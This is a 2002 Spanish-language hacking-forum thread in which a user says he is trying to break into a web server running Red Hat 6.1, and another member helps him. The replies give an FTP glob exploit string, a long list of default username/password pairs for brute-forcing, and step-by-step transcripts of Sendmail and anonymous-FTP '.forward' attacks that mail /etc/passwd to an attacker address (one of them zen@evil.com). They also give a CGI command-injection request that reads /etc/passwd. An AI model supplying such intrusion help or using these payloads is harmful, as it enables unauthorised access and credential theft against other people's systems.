elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Sigue las noticias más importantes de elhacker.net en ttwitter!


+  Foro de elhacker.net
|-+  Sistemas Operativos
| |-+  GNU/Linux (Moderador: MinusFour)
| | |-+  Vulnerabilidades red hat 6.1
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Vulnerabilidades red hat 6.1  (Leído 2,739 veces)
Ambolius


Desconectado Desconectado

Mensajes: 1.331


/España/Guadalajara


Ver Perfil
Vulnerabilidades red hat 6.1
« en: 30 Agosto 2002, 20:56 »

Una preguntita para los ya algo iniciados.

Estoy intentando entrar en el servidor de una pagina web, e probado ya varias cosas como intentar sacar la contraseña del root por ftp o intentar una conexion a traves de telnet, pero se me resiste y... me gustaria que alguien, si sabe, me dijera algun bug o fallo de el sistema linux red hat 6.1 que es el que tiene la maquina a la que quiero entrar.

Muxas gracias de antemano


En línea

Un informático a otro:
- ¿Cuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.
..sR. aDiKtO..
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.451


..enseña lo que sabes, aprende lo que no..


Ver Perfil
Re:Vulnerabilidades red hat 6.1
« Respuesta #1 en: 30 Agosto 2002, 22:05 »

Bueno si has probado con todos los invitados por defecto k tiene el RH y no te deja entrar, puedes hacerlo con algun programa de fuerza bruta, aunk esta idea no me gusta.
Tienes k saber k version de ftp tiene, a lo mejor te sirve el xploit "ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*"

Tambien puedes probar a colgar el finger

Pensemos sobre lo que finger hace actualmente. Es el primer programa que te encuentras cuando haces telnet a victima.net por el puerto 79. Y una vez allí, le puedes ordenar (mediante un comando) que se dirija a leer archivos de cualquier cuenta de usuario que puedas elegir.

Esto significa que finger puede mirar en cualquier cuenta.

Eso significa que si finger se cuelga, puedes acabar siendo root.

Por favor, si por casualidad consigues privilegios de root en el host de cualquier extraño, ¡sal de ese ordenador inmediatamente! También harías bien buscando una buena excusa para los administradores de tu sistema y la policía por si fueses detenido!

Si consiguieras hacer que finger se colgara dándole algún comando como ///*^S, puedes pasar un buen tiempo intentando explicar que estabas buscando información disponible al público inocentemente. JEJE

Por ultimo te recomiendo esta pagina http://www.hack.co.za/ encontraras cosas muy interesantes JEJE

Hay muchas formas de entrar solo tienes k encontrar un bug, mñn te explico un poco mas, k ahora me tengo k ir. SALU2


« Última modificación: 30 Agosto 2002, 22:10 por ..sR. aDiKtO.. » En línea

Ambolius


Desconectado Desconectado

Mensajes: 1.331


/España/Guadalajara


Ver Perfil
Re:Vulnerabilidades red hat 6.1
« Respuesta #2 en: 31 Agosto 2002, 13:01 »

e estado recabando algo de informacion sobre ese servidor y e descubierto que utiliza un ftp version wv-2.6.0(1) o eso ponia.

Al ver cuales eran los puertos que estaban abiertos vi que tenia:

el 21 de ftp
el 23 de telnet
el 25 de algo del correo
el 53 que no tengo ni zorra
el 80 que es de su pagina web

el 81
         los dos ni idea
el 82

y el 110 del correo tambien.

Sbiendo esto... me sirve ese exploit mencionado???

Alguna otra forma para entrar???

En línea

Un informático a otro:
- ¿Cuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.
..sR. aDiKtO..
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.451


..enseña lo que sabes, aprende lo que no..


Ver Perfil
Re:Vulnerabilidades red hat 6.1
« Respuesta #3 en: 31 Agosto 2002, 14:55 »

Cuentas defaults en general:
adm
admin
ann
anon
anonymous/anonymous
backup
batch
bin
checkfsys
daemon
demo
diag
field
ftp
games
guest/guest
guest/anonymous
help
install
listen
lp
lpadmin
maint
makefsys
mountfsys
network
news
nobody
nuucp
nuucpa
operator
powerdown
printer
pub
public
reboot
rje
rlogin
root
sa
setup
shutdown
startup
sync
sys/sys
sysadm
sysadmin
sysbin/sysbin   sysbin/bin
sysman
system
tech
test
trouble
tty
umountfsys
user/user   user1/user1
uucp
uucpa
visitor
root/root
root/system
sys/sys
sys/system
daemon/daemon
uucp/uucp
tty/tty
test/test
unix/unix
unix/test
bin/bin
adm/adm
adm/admin
admin/adm
admin/admin
sysman/sysman
sysman/sys
sysman/system
sysadmin/sysadmin
sysadmin/sys
sysadmin/system
sysadmin/admin
sysadmin/adm
who/who
learn/learn
uuhost/uuhost
guest/guest
host/host
nuucp/nuucp
rje/rje
games/games
games/player
sysop/sysop
root/sysop
demo/demo
decnet/ddennet
guest/friend
field/service
guest/welcome
system/manager
default/user
decnet/nonpriv
field/digital
field/test
postmaster/mail
sysmaint/service
sysmaint/digital
system/operator
system/manager
system/syslib
system/uetp
systest_clig/systest
userp/user
sysadmin/admin
daemon/daemon
sysbin/sysbin



Versiones: Sendmail, versiones anteriores a la 5.57 que no esten parcheadas
 tumaquina% telnet victima.com 25
 Trying X.Y.Z.A...
 Connected to victima.com
 Escape character is '^]'.
 220 victima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
 mail from: "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"
 250 "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"... Sender ok
 rcpt to: loquequieras
 550 loquequieras... User unknown
 data
 354 Enter mail, end with "." on a line by itself
 .
 250 Mail accepted
 quit
 Connection closed by foreign host. Notas:
-victima.com = nombre del ordenador a hackear
-mimaquina = nombre de nuestro ordenador
-Lo que aparece con un numero delante son  mensajes de nuestra victima,
el resto es lo que tienes que escribir. La idea de este bug, es que usualmente, en el sendmail en la linea de mail
from: pondrias pepe@uno.es , pero sin embargo, y la gracia esta aqui, le dices
que te mande el fichero /etc/passwd. Pero os digo una cosa sinceramente, este
bug no funciona casi nunca, y si funciona, felicidades , estas en una maquina
que el rOOt no tiene ni p**a idea, Como conseguir el fichero /etc/passwd si el ftp esta mal configurado La victima debe de tener una copia completa del fichero /etc/passwd en su ftp
anonimo -ftp/etc en vez de una version reducida. Sin embargo, puedes ver que
normalmente nunca aparece el fichero verdadero :( , pero el home directory de
"ftp" puede ser escribible en victim.com. Esto te permite ejecutar comandos
remotamente - en este caso, mandarte el archivo por mail a ti mismo - por el
simple metodo de crear un archivo .forward que ejecuta un comando cuando un
mail es mandado a la cuenta "ftp". evil % cat forward_sucker_file
 "|/bin/mail zen@evil.com < /etc/passwd"  evil % ftp victim.com
 Connected to victim.com
 220 victim FTP server ready.
 Name (victim.com:zen): ftp
 331 Guest login ok, send ident as password.
 Password:
 230 Guest login ok, access restrictions apply.
 ftp> ls -lga
 200 PORT command successful.
 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
 total 5
 drwxr-xr-x  4 101      1             512 Jun 20  1991 .
 drwxr-xr-x  4 101      1             512 Jun 20  1991 ..
 drwxr-xr-x  2 0        1             512 Jun 20  1991 bin
 drwxr-xr-x  2 0        1             512 Jun 20  1991 etc
 drwxr-xr-x  3 101      1             512 Aug 22  1991 pub
 226 ASCII Transfer complete.
 242 bytes received in 0.066 seconds (3.6 Kbytes/s)
 ftp> put forward_sucker_file .forward
 43 bytes sent in 0.0015 seconds (28 Kbytes/s)
 ftp> quit
 evil % echo test | mail ftp@victim.com
  Ahora simplemente tienes que esperar a que el fichero de passwords te sea
enviado.
Sin embargo existe un bug que da paso a la ejecucion remota de comandos. El
sistema intentara abrir el fichero (taluego_Lucas) y si no existe dara un
mensaje de error para a continuacion ejecutar el comando que sigue. Muy
importante, el espacio entre el comando cat y su argumento es un *tabulador*
(TAB), no se admiten espacios asi que aunque podeis poner otro comando que
no sea cat no podreis poner ningun comando que requiera espacios.
        $ telnet victima.com 80
        $ GET /cgi-bin/handler/taluego_Lucas;cat   /etc/passwd|?data=Download
        $ HTTP/1.0 En IRIX 6.3
   se intento arreglar esto pero lo unico que se consiguio fue que el formato del bug pase a ser:
        $telnet victima.com 80
        $GET /cgi-bin/handler/whatever;cat    /etc/passwd|   ?data=Download
        $HTTP/1.0
   Con un nuevo TAB para "engañar" al script PERL. Hay muchos mas, pero no me apetece seguir escribiendo..

Busca por la red k hay mucha informacion, mas de la k te puedas creer. SALU2.
En línea

Ambolius


Desconectado Desconectado

Mensajes: 1.331


/España/Guadalajara


Ver Perfil
Re:Vulnerabilidades red hat 6.1
« Respuesta #4 en: 7 Septiembre 2002, 17:30 »

Gracias tio, aunke me lo tendre que "estudiar" detenidamente
En línea

Un informático a otro:
- ¿Cuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con vulnerabilidades
Hacking Avanzado
Xenomorfo77 1 1,717 Último mensaje 6 Junio 2012, 21:40
por Stakewinner00
VULNERABILIDADES
Bugs y Exploits
moskita789 4 2,501 Último mensaje 20 Diciembre 2012, 23:11
por Jaes
Vulnerabilidades XSS
Seguridad
AleBallesta 0 485 Último mensaje 21 Febrero 2015, 20:36
por AleBallesta
Vulnerabilidades ;)
Nivel Web
in2c0de 1 1,124 Último mensaje 26 Octubre 2015, 20:57
por WHK
Vulnerabilidades en WPA TPIK
Hacking Wireless
wozsoft 5 1,047 Último mensaje 25 Mayo 2017, 19:05
por wozsoft
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines